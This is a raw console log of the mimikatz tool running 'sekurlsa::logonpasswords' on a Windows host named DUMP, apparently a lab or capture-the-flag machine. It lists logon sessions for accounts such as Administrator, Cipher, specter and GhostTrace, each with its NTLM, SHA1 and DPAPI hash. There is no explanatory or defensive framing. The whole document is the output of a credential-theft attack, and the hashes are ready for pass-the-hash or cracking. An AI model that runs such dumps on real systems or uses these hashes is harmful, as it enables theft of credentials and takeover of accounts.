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.#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08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.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)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## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com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## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz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'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com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'#####'        &gt; https://pingcastle.com / https://mysmartlogon.com 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mimikatz # sekurlsa::logonpasswords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Authentication Id : 0 ; 5056238 (00000000:004d26ee)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Session           : Interactive from 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Name         : DWM-9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Logon Time        : 3/3/2025 8:48:25 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SID               : S-1-5-90-0-9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Authentication Id : 0 ; 5056204 (00000000:004d26cc)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Session           : Interactive from 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Name         : DWM-9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Logon Time        : 3/3/2025 8:48:25 PM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SID               : S-1-5-90-0-9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Authentication Id : 0 ; 4020561 (00000000:003d5951)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Session           : Interactive from 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 Name         : UMFD-8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Logon Time        : 3/3/2025 8:47:58 PM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SID               : S-1-5-96-0-8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Authentication Id : 0 ; 3423777 (00000000:00343e21)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Session           : Interactive from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User Name         : DWM-7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Logon Time        : 3/3/2025 8:47:46 PM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SID               : S-1-5-90-0-7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Authentication Id : 0 ; 3422333 (00000000:0034387d)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Session           : Interactive from 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User Name         : UMFD-7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Logon Time        : 3/3/2025 8:47:46 PM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SID               : S-1-5-96-0-7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credman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Authentication Id : 0 ; 2988284 (00000000:002d98fc)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Session           : RemoteInteractive from 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Name         : ByteReaper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Logon Time        : 3/3/2025 8:47:33 PM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* Username : ByteReaper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* NTLM     : 43034346035d7a24b1eaa1c82acaef3e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* SHA1     : f3b540c9d2f6d4167d4547231518ea1e177f1ef3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* DPAPI    : f3b540c9d2f6d4167d4547231518ea1e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* Username : ByteReaper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* Username : ByteReaper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Authentication Id : 0 ; 2977376 (00000000:002d6e60)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Session           : Interactive from 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User Name         : DWM-6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Logon Time        : 3/3/2025 8:47:33 PM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SID               : S-1-5-90-0-6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Authentication Id : 0 ; 2975990 (00000000:002d68f6)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Session           : Interactive from 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User Name         : UMFD-6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Logon Time        : 3/3/2025 8:47:33 PM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SID               : S-1-5-96-0-6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Authentication Id : 0 ; 2639338 (00000000:002845ea)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Session           : RemoteInteractive from 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User Name         : NullPhantom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Logon Time        : 3/3/2025 8:47:19 PM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S-1-5-21-1966530601-3185510712-10604624-1011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* Username : NullPhantom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* NTLM     : 75b216fc8d12fbd0124d0c0865118e4d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* SHA1     : 5fd4a13af67509c2767224bb1af6644f3f7ed6d4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* DPAPI    : 5fd4a13af67509c2767224bb1af6644f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* Username : NullPhantom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* Username : NullPhantom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Authentication Id : 0 ; 2629201 (00000000:00281e51)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Session           : Interactive from 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User Name         : DWM-5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Logon Time        : 3/3/2025 8:47:19 PM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SID               : S-1-5-90-0-5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Authentication Id : 0 ; 1918110 (00000000:001d449e)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Session           : RemoteInteractive from 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User Name         : specter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Logon Time        : 3/3/2025 8:44:47 PM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S-1-5-21-1966530601-3185510712-10604624-1008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* Username : specter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* NTLM     : 2c3e48bac1b65c52fc0fb0cd70eaf3aa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* SHA1     : 18daa8d22e0c63318e349c84f02ccde9f4703faa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* DPAPI    : 18daa8d22e0c63318e349c84f02ccde9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* Username : specter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* Username : specter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Authentication Id : 0 ; 1906796 (00000000:001d186c)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Session           : Interactive from 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User Name         : UMFD-4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Logon Time        : 3/3/2025 8:44:46 PM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SID               : S-1-5-96-0-4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Authentication Id : 0 ; 996167 (00000000:000f3347)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Session           : RemoteInteractive from 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User Name         : Cipher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Logon Time        : 3/3/2025 8:35:17 PM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S-1-5-21-1966530601-3185510712-10604624-1009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* Username : Cipher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* NTLM     : 6786c31df90f9568d4ca2480affeea9a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* SHA1     : a326d034836aa5ae571910a8ffe0d8b94a1a9f21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* DPAPI    : a326d034836aa5ae571910a8ffe0d8b9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* Username : Cipher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* Username : Cipher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Authentication Id : 0 ; 381688 (00000000:0005d2f8)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Session           : RemoteInteractive from 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User Name         : Administrator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Logon Time        : 3/3/2025 7:43:44 PM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SID               : S-1-5-21-1966530601-3185510712-10604624-500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* Username : Administrator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* NTLM     : 2dfe3378335d43f9764e581b856a662a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* SHA1     : 6529ad96db96f0332eb6ab3d912923d55f34b947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* DPAPI    : 6529ad96db96f0332eb6ab3d912923d5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* Username : Administrator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* Username : Administrator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Authentication Id : 0 ; 351053 (00000000:00055b4d)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Session           : Interactive from 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User Name         : UMFD-2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Logon Time        : 3/3/2025 7:43:43 PM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SID               : S-1-5-96-0-2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Authentication Id : 0 ; 996 (00000000:000003e4)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Session           : Service from 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User Name         : DUMP$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Domain            : WORKGROUP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Logon Time        : 3/3/2025 7:38:49 PM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SID               : S-1-5-20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Authentication Id : 0 ; 25872 (00000000:00006510)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Session           : Interactive from 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User Name         : UMFD-1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Logon Time        : 3/3/2025 7:38:49 PM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SID               : S-1-5-96-0-1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Authentication Id : 0 ; 25841 (00000000:000064f1)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Session           : Interactive from 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User Name         : UMFD-0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Logon Time        : 3/3/2025 7:38:49 PM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SID               : S-1-5-96-0-0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Authentication Id : 0 ; 5073537 (00000000:004d6a81)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Session           : RemoteInteractive from 9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User Name         : ShadowPacket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Logon Time        : 3/3/2025 8:48:25 PM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S-1-5-21-1966530601-3185510712-10604624-1014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* Username : ShadowPacket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* NTLM     : 5fe2eb8c75c48179bce6025e70859e47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* SHA1     : a9251b4d13ca76d70a6f32c503b85a4a29bb5ab5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* DPAPI    : a9251b4d13ca76d70a6f32c503b85a4a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* Username : ShadowPacket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* Username : ShadowPacket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Authentication Id : 0 ; 5054852 (00000000:004d2184)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Session           : Interactive from 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User Name         : UMFD-9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Logon Time        : 3/3/2025 8:48:25 PM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SID               : S-1-5-96-0-9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Authentication Id : 0 ; 4041327 (00000000:003daa6f)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Session           : RemoteInteractive from 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User Name         : GhostTrace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Logon Time        : 3/3/2025 8:47:59 PM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S-1-5-21-1966530601-3185510712-10604624-1013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* Username : GhostTrace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* NTLM     : 4820e4687d0ed2845328aa492dc0b33c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* SHA1     : 4bb51376ce7cc228e124dad2eeb9b8d62db1844f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* DPAPI    : 4bb51376ce7cc228e124dad2eeb9b8d6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* Username : GhostTrace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* Username : GhostTrace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Authentication Id : 0 ; 4021983 (00000000:003d5edf)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Session           : Interactive from 8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User Name         : DWM-8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Logon Time        : 3/3/2025 8:47:58 PM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SID               : S-1-5-90-0-8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Authentication Id : 0 ; 4021919 (00000000:003d5e9f)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Session           : Interactive from 8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User Name         : DWM-8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Logon Time        : 3/3/2025 8:47:58 PM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SID               : S-1-5-90-0-8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Authentication Id : 0 ; 3435190 (00000000:00346ab6)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Session           : RemoteInteractive from 7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User Name         : DarkInjector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Logon Time        : 3/3/2025 8:47:46 PM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S-1-5-21-1966530601-3185510712-10604624-1012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* Username : DarkInjector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* NTLM     : 3a659a65d9c16d40a28684995782458f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* SHA1     : 76896bc65bdf920328a5fba3bcc67fb8c42b6252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* DPAPI    : 76896bc65bdf920328a5fba3bcc67fb8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* Username : DarkInjector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* Username : DarkInjector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Authentication Id : 0 ; 3423671 (00000000:00343db7)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Session           : Interactive from 7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User Name         : DWM-7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Logon Time        : 3/3/2025 8:47:46 PM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SID               : S-1-5-90-0-7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Authentication Id : 0 ; 2977722 (00000000:002d6fba)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Session           : Interactive from 6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User Name         : DWM-6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Logon Time        : 3/3/2025 8:47:33 PM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SID               : S-1-5-90-0-6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Authentication Id : 0 ; 2629031 (00000000:00281da7)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Session           : Interactive from 5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User Name         : DWM-5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Logon Time        : 3/3/2025 8:47:19 PM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SID               : S-1-5-90-0-5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Authentication Id : 0 ; 2627648 (00000000:00281840)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Session           : Interactive from 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User Name         : UMFD-5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Logon Time        : 3/3/2025 8:47:19 PM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SID               : S-1-5-96-0-5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Authentication Id : 0 ; 1908066 (00000000:001d1d62)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Session           : Interactive from 4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User Name         : DWM-4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Logon Time        : 3/3/2025 8:44:46 PM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SID               : S-1-5-90-0-4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Authentication Id : 0 ; 1908042 (00000000:001d1d4a)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Session           : Interactive from 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User Name         : DWM-4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Logon Time        : 3/3/2025 8:44:46 PM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SID               : S-1-5-90-0-4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Authentication Id : 0 ; 996138 (00000000:000f332a)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Session           : RemoteInteractive from 3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User Name         : Cipher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Domain            : DUMP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Logon Server      : DUMP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Logon Time        : 3/3/2025 8:35:17 PM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SID               : S-1-5-21-1966530601-3185510712-10604624-1009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[00000003] Primary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* Username : Cipher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* NTLM     : 6786c31df90f9568d4ca2480affeea9a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* SHA1     : a326d034836aa5ae571910a8ffe0d8b94a1a9f21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* DPAPI    : a326d034836aa5ae571910a8ffe0d8b9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* Username : Cipher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* Username : Cipher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* Domain   : DUMP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Authentication Id : 0 ; 986542 (00000000:000f0dae)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Session           : Interactive from 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User Name         : DWM-3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Logon Time        : 3/3/2025 8:35:16 PM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SID               : S-1-5-90-0-3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Authentication Id : 0 ; 986506 (00000000:000f0d8a)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Session           : Interactive from 3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User Name         : DWM-3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Logon Time        : 3/3/2025 8:35:16 PM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SID               : S-1-5-90-0-3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Authentication Id : 0 ; 985141 (00000000:000f0835)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Session           : Interactive from 3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User Name         : UMFD-3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Domain            : Font Driver Host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Logon Time        : 3/3/2025 8:35:16 PM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SID               : S-1-5-96-0-3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Authentication Id : 0 ; 352793 (00000000:00056219)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Session           : Interactive from 2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User Name         : DWM-2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Logon Time        : 3/3/2025 7:43:43 PM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SID               : S-1-5-90-0-2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Authentication Id : 0 ; 352399 (00000000:0005608f)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Session           : Interactive from 2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User Name         : DWM-2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Logon Time        : 3/3/2025 7:43:43 PM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SID               : S-1-5-90-0-2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Authentication Id : 0 ; 46499 (00000000:0000b5a3)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Session           : Interactive from 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User Name         : DWM-1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Logon Time        : 3/3/2025 7:38:49 PM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SID               : S-1-5-90-0-1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Authentication Id : 0 ; 46465 (00000000:0000b581)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Session           : Interactive from 1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User Name         : DWM-1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Domain            : Window Manager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Logon Time        : 3/3/2025 7:38:49 PM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SID               : S-1-5-90-0-1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Authentication Id : 0 ; 997 (00000000:000003e5)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Session           : Service from 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User Name         : LOCAL SERVICE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Domain            : NT AUTHORITY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Logon Time        : 3/3/2025 7:38:49 PM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SID               : S-1-5-19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* Username : (null)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* Domain   : (null)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* Username : (null)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* Domain   : (null)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Authentication Id : 0 ; 24702 (00000000:0000607e)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Session           : UndefinedLogonType from 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User Name         : (null)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Domain            : (null)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Logon Time        : 3/3/2025 7:38:48 PM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SID               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Authentication Id : 0 ; 999 (00000000:000003e7)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Session           : UndefinedLogonType from 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User Name         : DUMP$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Domain            : WORKGROUP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Logon Server      : (null)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Logon Time        : 3/3/2025 7:38:48 PM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SID               : S-1-5-18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msv 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tspkg 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wdigest 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kerberos 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* Username : dump$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* Domain   : WORKGROUP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* Password : (null)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ssp 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credman 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mimikatz #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